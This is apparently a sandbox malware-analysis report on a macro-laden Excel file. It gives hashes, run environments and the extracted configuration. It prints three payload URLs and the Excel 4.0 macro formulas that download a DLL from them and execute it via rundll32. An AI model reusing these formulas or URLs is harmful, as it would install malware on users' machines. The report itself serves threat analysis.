General
Target: ?i=1awpumfgz
Size: 83KB
Sample: 220522-f566dsbbgr
MD5: c70893d52dce1a97f5cabbcd042d286c
SHA1: 521a0ff74064ea610ca112d166319f55d792b667
SHA256: 37bb74fcd5b1ff6bbd323163e21277b3ed80d124cc4d727f4ec64d1048a2c85e
SHA512: 507a95d0f831f221e44f9a0c162490fa836cd21d5ee11522b661c198a4c4a295b74960bd3cf43bfda7815e6eee88111b7be5a0a63a1bf14339648a540571e203
Behavioral task: behavioral1
Sample: ?i=1awpumfgz.xlsm
Resource: win7-20220414-en
Behavioral task: behavioral2
Sample: ?i=1awpumfgz.xlsm
Resource: win10v2004-20220414-en
Malware Config
Extracted
https://digitalcardsbychivami.xyz/includes/KrPj/
http://demo.avionxpress.com/assets/XqQrGSKq8TrVj/
http://swipermachinereview.xyz/wp-includes/t3Ow4KF0p0Q8oo/
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://digitalcardsbychivami.xyz/includes/KrPj/","..\dwa.ocx",0,0)
=IF('RHEEHGF'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://demo.avionxpress.com/assets/XqQrGSKq8TrVj/","..\dwa.ocx",0,0))
=IF('RHEEHGF'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://swipermachinereview.xyz/wp-includes/t3Ow4KF0p0Q8oo/","..\dwa.ocx",0,0))
=IF('RHEEHGF'!D21<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\rundll32.exe ..\dwa.ocx,D""&""l""&""lR""&""egister""&""Server")
=RETURN()
Targets
Target
?i=1awpumfgz
Score 10/10